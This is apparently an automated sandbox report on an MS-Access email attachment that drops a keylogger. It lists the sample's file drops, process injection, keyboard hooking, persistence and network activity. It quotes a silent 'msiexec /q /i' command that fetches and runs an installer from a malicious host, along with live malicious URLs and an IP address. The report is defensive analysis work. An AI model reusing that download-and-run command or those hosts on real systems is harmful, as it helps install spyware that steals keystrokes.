MS-Access Email Attachment Drops Keylogger

Severity	Category	Operation	Classification
5/5	File System	Modifies operating system directory	-
Modifies file "C:\Windows\Installer\MSI81A0.tmp" in the OS directory. ... VTI Actions Go to function call
Creates file "C:\Windows\Installer\a6cfff.ipi" in the OS directory. ... VTI Actions Go to function call
Modifies file "C:\Windows\Installer\MSID0F9.tmp" in the OS directory. ... VTI Actions Go to function call
Modifies file "C:\Windows\Installer\MSI504.tmp" in the OS directory. ... VTI Actions Go to function call
Creates file "C:\Windows\Installer\MSI504.tmp" in the OS directory. ... VTI Actions Go to function call
5/5	Injection	Writes into the memory of another running process	-
"c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe" modifies memory of "c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe" ... VTI Actions Go to function call
"c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe" modifies memory of "c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe" ... VTI Actions Go to function call
5/5	Injection	Modifies control flow of another process	-
"c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe" alters context of "c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe" ... VTI Actions Go to function call
"c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe" alters context of "c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe" ... VTI Actions Go to function call
4/5	Process	Creates process	-
Creates process "msiexec /q /i https://jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\MsiExec.exe". ... VTI Actions Go to function call
Creates process "expand.exe". ... VTI Actions Go to function call
Creates process "C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe". ... VTI Actions Go to function call
Creates process "C:\Users\JPenUM\AppData\Local\Temp\b106484eb915e4ad6df697dc1442cbff-EDITED.jpg". ... VTI Actions Go to function call
Creates process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe". ... VTI Actions Go to function call
Creates process "schtasks". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\cmd.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\PING.EXE". ... VTI Actions Go to function call
4/5	Process	Reads from memory of another process	-
"c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe" reads from "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe". ... VTI Actions Go to function call
"c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe" reads from "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe". ... VTI Actions Go to function call
4/5	Device	Monitors keyboard input	Keylogger
Installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes. ... VTI Actions Go to function call
4/5	Network	Associated with known malicious/suspicious URLs	-
URL "HTTPS://jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png" is known as malicious URL. ... VTI Actions Go to function call
URL "linkadrum.nl" is known as malicious URL. ... VTI Actions
4/5	Network	Downloads data	Downloader
URL "HTTPS://jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png". ... VTI Actions Go to function call
4/5	Persistence	Installs system service	-
Installs service "RtkAudioService64" by using the sc.exe utility. ... VTI Actions
3/5	Anti Analysis	Delays execution	-
One thread sleeps more than 5 minutes. ... VTI Actions Go to function call
3/5	Network	Performs DNS request	-
Resolves host name "ArRARNMKU". ... VTI Actions Go to function call
Resolves host name "127.0.0.1". ... VTI Actions Go to function call
Resolves host name "linkadrum.nl". ... VTI Actions Go to function call
Resolves host name "www.iptrackeronline.com". ... VTI Actions Go to function call
3/5	Network	Connects to remote host	-
Outgoing TCP connection to host "45.55.57.244:443". ... VTI Actions Go to function call
3/5	PE	Executes dropped PE file	-
Executes dropped file "C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe". ... VTI Actions Go to file details Go to function call
2/5	Anti Analysis	Tries to detect debugger	-
Check via API "IsDebuggerPresent". ... VTI Actions Go to function call
2/5	Network	Connects to HTTP server	-
URL "jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png". ... VTI Actions Go to function call
2/5	PE	Drops PE file	Dropper
Drops file "C:\Windows\Installer\MSID0F9.tmp". ... VTI Actions Go to file details Go to function call
Drops file "C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe". ... VTI Actions Go to file details Go to function call
1/5	Process	Creates system object	-
Creates mutex with name "AuditNativeSnapIn". ... VTI Actions Go to function call
Creates mutex with name "a403e9b3-6f76-41ac-ab55-e693040d1b8b". ... VTI Actions Go to function call
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
1/5	Static	Unparsable sections in file	-
Static analyzer was unable to completely parse the analyzed file: C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe. ... VTI Actions Go to file details

Before

After